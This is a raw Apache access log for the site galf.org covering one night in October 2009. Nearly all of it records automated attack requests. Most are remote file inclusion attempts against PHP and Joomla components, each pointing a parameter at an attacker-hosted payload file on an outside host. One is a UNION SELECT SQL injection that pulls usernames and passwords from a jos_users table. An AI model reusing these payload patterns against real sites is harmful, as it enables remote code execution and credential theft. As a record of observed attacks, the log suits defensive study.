210.115.180.221 - - [25/Oct/2009:23:50:28 -0700] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.115.180.221 - - [25/Oct/2009:23:51:31 -0700] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.115.180.221 - - [25/Oct/2009:23:51:31 -0700] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.115.180.221 - - [25/Oct/2009:23:51:31 -0700] "GET /logs/access.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.203 - - [25/Oct/2009:23:52:18 -0700] "GET /send_reminders.php?includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.203 - - [25/Oct/2009:23:52:19 -0700] "GET /logs/access_090713.log%20%20/send_reminders.php?includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.203 - - [25/Oct/2009:23:52:19 -0700] "GET /logs/send_reminders.php?includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.203 - - [25/Oct/2009:23:52:51 -0700] "GET /logs/access_090511.log%20%20/send_reminders.php?includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [25/Oct/2009:23:53:39 -0700] "GET /logs/access_090713.log/send_reminders.php?includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [25/Oct/2009:23:53:39 -0700] "GET /send_reminders.php?includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [25/Oct/2009:23:53:39 -0700] "GET /logs/send_reminders.php?includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [25/Oct/2009:23:53:59 -0700] "GET /logs/access_090511.log/send_reminders.php?includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:57:10 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.10.136.56 - - [25/Oct/2009:23:57:10 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.10.136.56 - - [25/Oct/2009:23:57:10 -0700] "GET /logs/access.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.10.136.56 - - [25/Oct/2009:23:57:35 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.10.136.56 - - [25/Oct/2009:23:57:39 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:57:39 -0700] "GET /logs/access_091012.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:57:39 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:57:49 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.10.136.56 - - [25/Oct/2009:23:57:49 -0700] "GET /logs/access.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.10.136.56 - - [25/Oct/2009:23:58:12 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:58:12 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:58:12 -0700] "GET /logs/access_091012.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:58:26 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:58:26 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:58:26 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:58:26 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:59:47 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.10.136.56 - - [26/Oct/2009:00:00:09 -0700] "GET /logs/access_091012.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [26/Oct/2009:00:00:33 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.10.136.56 - - [26/Oct/2009:00:00:57 -0700] "GET /logs/access_091012.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:00:05:13 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
209.97.212.185 - - [26/Oct/2009:00:05:13 -0700] "GET /logs/access.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
209.97.212.185 - - [26/Oct/2009:00:05:13 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
201.218.228.226 - - [26/Oct/2009:00:05:37 -0700] "GET /logs/access.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
201.218.228.226 - - [26/Oct/2009:00:05:37 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
201.218.228.226 - - [26/Oct/2009:00:05:37 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
209.97.212.185 - - [26/Oct/2009:00:07:58 -0700] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.203 - - [26/Oct/2009:00:08:10 -0700] "GET /logs/access_090713.log/send_reminders.php?includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.203 - - [26/Oct/2009:00:08:22 -0700] "GET /logs/access_090511.log/send_reminders.php?includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:08:40 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:08:40 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:08:40 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:08:40 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:00:08:49 -0700] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
220.125.237.35 - - [26/Oct/2009:00:17:20 -0700] "GET /articulo.php?id_articulo=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
220.125.237.35 - - [26/Oct/2009:00:17:20 -0700] "GET /logs/access.log//articulo.php?id_articulo=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
220.125.237.35 - - [26/Oct/2009:00:17:20 -0700] "GET /logs//articulo.php?id_articulo=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
174.143.3.188 - - [26/Oct/2009:00:18:44 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:18:44 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:18:44 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:18:44 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:00:19:04 -0700] "GET /logs/access_090713.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:00:19:04 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:00:19:04 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
63.223.85.28 - - [26/Oct/2009:00:20:30 -0700] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yoontae.com/bbs///data/rfid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
63.223.85.28 - - [26/Oct/2009:00:20:30 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yoontae.com/bbs///data/rfid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
63.223.85.28 - - [26/Oct/2009:00:20:30 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yoontae.com/bbs///data/rfid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
63.223.85.28 - - [26/Oct/2009:00:20:44 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yoontae.com/bbs///data/rfid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
63.223.85.28 - - [26/Oct/2009:00:20:44 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yoontae.com/bbs///data/rfid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
63.223.85.28 - - [26/Oct/2009:00:20:44 -0700] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yoontae.com/bbs///data/rfid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
63.223.85.28 - - [26/Oct/2009:00:20:54 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yoontae.com/bbs///data/rfid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "galf.org"
63.223.85.28 - - [26/Oct/2009:00:20:55 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yoontae.com/bbs///data/rfid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "galf.org"
63.223.85.28 - - [26/Oct/2009:00:20:55 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yoontae.com/bbs///data/rfid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "galf.org"
95.168.183.191 - - [26/Oct/2009:00:20:57 -0700] "GET /logs/access_090810.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
95.168.183.191 - - [26/Oct/2009:00:20:57 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
63.223.85.28 - - [26/Oct/2009:00:21:04 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yoontae.com/bbs///data/rfid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "galf.org"
63.223.85.28 - - [26/Oct/2009:00:21:04 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yoontae.com/bbs///data/rfid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "galf.org"
63.223.85.28 - - [26/Oct/2009:00:21:04 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yoontae.com/bbs///data/rfid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "galf.org"
95.168.183.191 - - [26/Oct/2009:00:23:20 -0700] "GET /logs/access_090525.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
95.168.183.191 - - [26/Oct/2009:00:24:00 -0700] "GET /logs/access_091012.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:00:28:08 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:00:28:08 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:00:28:08 -0700] "GET /logs/access_090713.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:28:55 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:28:55 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:28:55 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:28:55 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
87.242.78.186 - - [26/Oct/2009:00:34:39 -0700] "GET /logs/access_090504.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.242.78.186 - - [26/Oct/2009:00:34:39 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
87.242.78.186 - - [26/Oct/2009:00:34:39 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
87.242.78.186 - - [26/Oct/2009:00:36:34 -0700] "GET /logs/access_090518.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:38:41 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:38:41 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:38:42 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:38:42 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.galf.org"
95.168.183.191 - - [26/Oct/2009:00:39:58 -0700] "GET /logs/access_090525.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.242.78.186 - - [26/Oct/2009:00:44:19 -0700] "GET /logs/access_090504.log////?_SERVER[DOCUMENT_ROOT]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.242.78.186 - - [26/Oct/2009:00:45:27 -0700] "GET /logs/access_090518.log////?_SERVER[DOCUMENT_ROOT]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:49:02 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:49:02 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:49:02 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:49:02 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
65.55.106.109 - - [26/Oct/2009:00:51:03 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.106.109 - - [26/Oct/2009:00:52:10 -0700] "GET /?N=A HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
85.198.148.17 - - [26/Oct/2009:00:52:35 -0700] "GET /logs/access_090810.log HTTP/1.1" 200 4806214 "http://search.yahoo.com/search;_ylt=A0geu9fAU.VKZh8BCDBXNyoA?p=index.php%3Foption%3Dcom_juser%26task%3Dshow_profile%26id%3D70%2Band%2B1%3D2%2Bunion%2Bselect%2B1%2C2%2Cconcat%28username%2C0x3a%2Cpassword%29chipdebi0s%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2Bfrom%2Bjos_users--&fr2=sb-top&sao=0" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.00" "www.galf.org"
85.198.148.17 - - [26/Oct/2009:00:52:59 -0700] "GET /index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 275 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.00" "www.galf.org"
85.198.148.17 - - [26/Oct/2009:00:52:59 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.galf.org/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.00" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:59:37 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:59:37 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:59:37 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:00:59:37 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
